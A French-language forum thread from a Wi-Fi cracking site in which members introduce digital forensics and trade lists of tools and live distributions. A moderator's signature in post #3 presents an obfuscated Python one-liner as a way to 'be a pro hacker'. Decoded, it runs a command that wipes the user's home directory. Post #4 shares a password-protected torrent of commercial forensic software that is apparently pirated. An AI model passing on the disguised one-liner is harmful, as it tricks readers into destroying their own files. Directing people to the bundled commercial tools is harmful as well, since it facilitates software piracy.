Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-01-2017 00:44:59

Morpheus_Dotcom
Membre Hyperactif

Parlons peu parlons Forensic ;)

Bonsoir le peuple j'ai regarder sur le forum et je n'ai rien trouver a propos de la forensic ici ce qui est dommage car la forensic est pourtant utilisez un peu partout ( suite a la perte de données / Sur procuration pour une enquête approfondie alors je pense que c'est d'une utilité public en tout cas ici de  parlez un peu de cette science smile

La forensic que ce que c'est ?

La forensic est une science c'est plutôt quelque chose a part entière dans le monde de l'informatique et de la programmation en effet c'est ce qui permet de recueillir des preuve dans la ram , le processeur et les disque dur ainsi que le registre.Quand vous croyez avoir bien effacé un fichier il en restera des traces quoi que vous ferez
la forensic consiste donc a récupérer ses restes en quelque sorte ^^

Par qui est elle utilisé ?

Par la cyber-police les administrateur de réseaux toute personne travaillant dans cette plage la serait peut être
un jour amener a utiliser des méthode d'analyse suite a un piratage perte de donner etc...Les exemple sont nombreux et varier

Et nous en tant que particulier peut on se procurer ce genre d'outils et a quelles prix ?

Oui bien-surs vous pouvez même vous entraîner a faire des analyse sur votre ram processeur etc...
quand au prix sa dépend vraiment certain outils sont gratuit d'autre coûte une fortune sa dépend
vraiment en tant que autodidacte les outils gratuit sont largement suffisant même je pense avoir un
ordinateur spécialement dédié serais vraiment le top ! smile

Quelle sont les logiciel sous Windows 7 ?

Voici une petite liste qui pourrait vous être utile c'est a vous de voir wink

1°) Access Data FTK Imager
2°) Amped Five
3°) Cofee ( soit dite en passant il est utilisé par la cyber-police / technicien
4°) dTective Suite
5°) Face4.0
6°) Passware password recovery

Pour ce qui est de Windows wink j'éditerais si j'en retrouve et je vous ferais un Torrent avec tout sa smile

Euh ta pas oublié Linux par hasard ?

Non rassurée vous j'ai penser au Linuxien aussi petite liste mais on parlera plus de distribution dédié
a cette utilisation spécifique

1°) Helix2008R1 : une distribution Linux sortis donc en 2008 spécialement dédié a cela ( gratuite sauf la version pro a 250$ si je me rappelle bien )

2°) CAINE (Computer Aided INvestigative Environment ) Une distrubution d'origine italienne aussi dédié a cela
très bonne  Distribution surtout qu'elle est gratuite wink c'est même la meilleurs pour moi ....

3°) Kali Forensic ( bon je pense que j'ai pas besoin de rajouter des chose la dessus ^^ ) lol

Voila pour ce qui est des tools j'èspère que sa vous sera utile  wink

Les liens de DL  juste en dessous

CAINE : http://www.caine-live.net/
HELIX  : http://helix.onofri.org/Helix2008R1.iso ( ATTENTION liens direct smile )

Sous Windows :

[ En cours de création ]

Dernière modification par Morpheus_Dotcom (21-01-2017 00:47:21)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-01-2017 10:34:41

M1ck3y
Administrateur
Lieu : Lost in the darkness

Re : Parlons peu parlons Forensic ;)

Bonjour,

Merci pour ces infos, sujet très intéressant smile

#3 21-01-2017 11:39:11

spawn
Modérateur

Y'a DFF et photorec qui sont excellents aussi.
Vous saviez qu'IDA (Hex-Rays, précédemment Datarescue) était à l'origine un carver de disques ?

@582a1cb9 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 22-01-2017 18:03:33

Morpheus_Dotcom
Membre Hyperactif

Bonsoir tous le monde cool

Je re-viens avec mon torrent pour windows

Le mot de passe : Upload_By_Morpheus_Dotcom
Le torrent : http://www.mediafire.com/file/9fd72i8nq … ip.torrent

contenus

1°) Access Data FTK Imager
2°) Amped Five
3°) Cofee ( soit dite en passant il est utilisé par la cyber-police / technicien
4°) dTective Suite
5°) Face4.0
6°) Passware password recovery
7°) Osforensic
8°) + Un Pdf en français

J'èspère que sa vous sera utile wink

Y'a DFF et photorec qui sont excellents aussi.
Vous saviez qu'IDA (Hex-Rays, précédemment Datarescue) était à l'origine un carver de disques ?

Merci pour ce complément d'information big_smile on ne parle pas assez de cette choses qui est la forensic wink

Dernière modification par Morpheus_Dotcom (22-01-2017 22:15:43)

#5 23-01-2017 10:57:04

MiscL
Membre V.I.P.
Lieu : BE

Sans oublier:
"SANS Investigative Forensic Toolkit (SIFT)" dont la chaine youtube regorge de vidéos plus qu'intéressantes (mais faut s'accrocher!) => https://www.youtube.com/channel/UCwSo89 … d41vskBDYA
-Volatility, même si plus axé "malware analysis". (souvent utilisé dans MISC)

-Sleuth (aka The Sleuth kit) ou Autopsy sous window' qui permet pas mal de choses en plus d'être facile d'utilisation et comprenant une GUI intuitive.

-DEFT, live dist plus que complète pour ce qui est de la récup de données et du forensic
Et pour tous ceux qui voudraient en faire un métier, ne pas oublier d'utiliser un bloqueur en écriture pour ne pas ruiner les timestamps et autres preuves (ex: DSi USB Write Blocker).

Si il y a des motivés, je suis entrain de potasser 2-3 bouquins sur le sujet, comprenant aussi des outils en python.

Bon amusement!

--|--   MiscL   --|--
- Accept No Limit -

#6 23-01-2017 11:03:41

Morpheus_Dotcom
Membre Hyperactif

MiscL a écrit :

Sans oublier:
"SANS Investigative Forensic Toolkit (SIFT)" dont la chaine youtube regorge de vidéos plus qu'intéressantes (mais faut s'accrocher!) => https://www.youtube.com/channel/UCwSo89 … d41vskBDYA
-Volatility, même si plus axé "malware analysis". (souvent utilisé dans MISC)

-Sleuth (aka The Sleuth kit) ou Autopsy sous window' qui permet pas mal de choses en plus d'être facile d'utilisation et comprenant une GUI intuitive.

-DEFT, live dist plus que complète pour ce qui est de la récup de données et du forensic
Et pour tous ceux qui voudraient en faire un métier, ne pas oublier d'utiliser un bloqueur en écriture pour ne pas ruiner les timestamps et autres preuves (ex: DSi USB Write Blocker).

Si il y a des motivés, je suis entrain de potasser 2-3 bouquins sur le sujet, comprenant aussi des outils en python.

Bon amusement!

Ha je veux bien les Titres wink sa m'interresse tout sa smile Merci d'avance

Par contre j'ai pas la Fibre hmm oublier pas a ceux qui DL le torrent de rester en SEED !! merci a vous wink

Dernière modification par Morpheus_Dotcom (23-01-2017 11:21:55)

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]